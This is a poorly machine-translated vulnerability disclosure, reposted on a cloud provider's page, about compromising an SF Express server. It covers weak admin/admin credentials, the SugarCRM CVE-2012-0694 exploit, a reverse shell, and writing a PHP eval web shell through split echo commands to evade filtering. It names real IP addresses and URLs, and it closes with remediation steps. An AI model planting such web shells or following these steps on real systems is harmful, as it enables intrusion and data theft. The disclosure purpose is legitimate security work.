PHP code execution vulnerability and repair in a sub-station of SF Express

Source: Internet
Author: User
Tags touch command domain transfer

It is actually a collection of vulnerabilities, including PHP code execution and information leakage, which leads to WebShell access.

1. DNS domain transfer Vulnerability
 
 
 
 
2. PHP Code Execution Vulnerability
Threw the sorted IP address into NMAP and found some risky systems.
Address: http: // 219.134.187.130: 8085/index. php? Module = Users & action = Login
Weak passwords admin/admin enter the background.
 
 
 
 
After entering the system, we found that the SugarCRM version was 6.2.3, and we used the latest Exploit (User Authentication required ).
CVE No.: CVE-2012-0694 SugarCRM CE <= 6.3.1 "unserialize ()" PHP Code Execution
 
So we get the reverse shell.
 
 
 
 
There was an episode before getting Webshell, and we found that wget commands were not usable. It seems that the firewall prohibited server external connection. However, the touch command can be used, and the vi command cannot be used. Only echo can be used. Create a 1. php file and write the file by echo.
 
Touch 1.php
Echo "<? Php eval ($ _ POST [cmd])?> "> 1.php
However, after each file is written, $ _ POST will be filtered out, for example.
 
 
 
 
So I thought I could use the XSS method (for more information about gainover, see http://www.wooyun.org/bugs/wooyun-2012-07854,haha,
So the first line
 
Echo-n "<? Php eval ($ "> 1.php
Row 2
 
Echo-n "_ POST [cmd])?> "> 1.php
 
 
 
 
 
Then, use a kitchen knife to connect and upload the Webshell. Www.2cto.com
 
 
 
 
Webshell address http: // 219.134.187.130: 8085/shell. php
Not deleted yet
 
Database Information
 
 
 
 
After cracking MD5, go to the recruitment website background
 


 
3. Information Leakage, including information about the Oracle database.
Http://uatmobile.sf-express.com/SFMobile.xml
 

Solution:

1. Modify the SugarCRM password.
 
2. Delete the http://uatmobile.w.express.com/sfmobile.xmlfile.
 
3. Delete the Webshell http: // 219.134.187.130: 8085/shell. php
 
4. Stop the service if it is not used, and separate the database from the application.
 
Are there any gifts? Haha, it seems that SF does not charge express delivery for gifts.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.